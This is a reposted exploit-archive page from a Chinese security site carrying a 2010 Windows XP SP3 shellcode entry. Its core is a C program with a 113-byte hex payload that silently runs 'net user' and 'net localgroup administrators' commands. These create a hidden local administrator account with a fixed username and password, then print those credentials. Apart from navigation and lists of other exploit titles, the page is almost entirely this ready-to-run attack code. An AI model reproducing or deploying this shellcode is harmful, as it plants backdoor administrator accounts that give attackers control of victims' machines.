首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
win32/xp pro sp3 (EN) 32-bit - add new local administrator 113 bytes
来源:anastasiosm[at]gmail[dot]com 作者:secuid0 发布时间:2010-10-05  

/*
Title: win32/xp pro sp3 (EN) 32-bit - add new local administrator 113 bytes
Author: Anastasios Monachos (secuid0) - anastasiosm[at]gmail[dot]com
Method: Hardcoded opcodes (kernel32.winexec@7c8623ad, kernel32.exitprocess@7c81cafa)
Tested on: WinXP Pro SP3 (EN) 32bit - Build 2600.080413-2111
Greetz: offsec and inj3ct0r teams
*/
#include <stdio.h>
#include <string.h>
#include <stdlib.h>

char code[] =  "\xeb\x16\x5b\x31\xc0\x50\x53\xbb\xad\x23"
    "\x86\x7c\xff\xd3\x31\xc0\x50\xbb\xfa\xca"
    "\x81\x7c\xff\xd3\xe8\xe5\xff\xff\xff\x63"
    "\x6d\x64\x2e\x65\x78\x65\x20\x2f\x63\x20"
    "\x6e\x65\x74\x20\x75\x73\x65\x72\x20\x73"
    "\x65\x63\x75\x69\x64\x30\x20\x6d\x30\x6e"
    "\x6b\x20\x2f\x61\x64\x64\x20\x26\x26\x20"
    "\x6e\x65\x74\x20\x6c\x6f\x63\x61\x6c\x67"
    "\x72\x6f\x75\x70\x20\x61\x64\x6d\x69\x6e"
    "\x69\x73\x74\x72\x61\x74\x6f\x72\x73\x20"
    "\x73\x65\x63\x75\x69\x64\x30\x20\x2f\x61"
    "\x64\x64\x00";

int main(int argc, char **argv)
{
 ((void (*)())code)();
 printf("New local admin \tUsername: secuid0\n\t\t\tPassword: m0nk");
 return 0;
}


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·generic win32 - add new local
·FreeBSD 'pseudofs' NULL Pointe
·Cilem Haber v1.4.4 (Tr) Databa
·SnackAmp 3.1.3B Malicious SMP
·kernel-2.6.18-164 2010 Local R
·Abhimanyu Infotech (show_news.
·MySql version 5.2 Change passw
·AudioTran 1.4.2.4 SafeSEH + SE
·Adobe Acrobat and Reader Array
·Hanso Player Version 1.3.0 (.m
·ASP.NET Padding Oracle Vulnera
·FileApp < 2.0 for iPhone, iPad
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved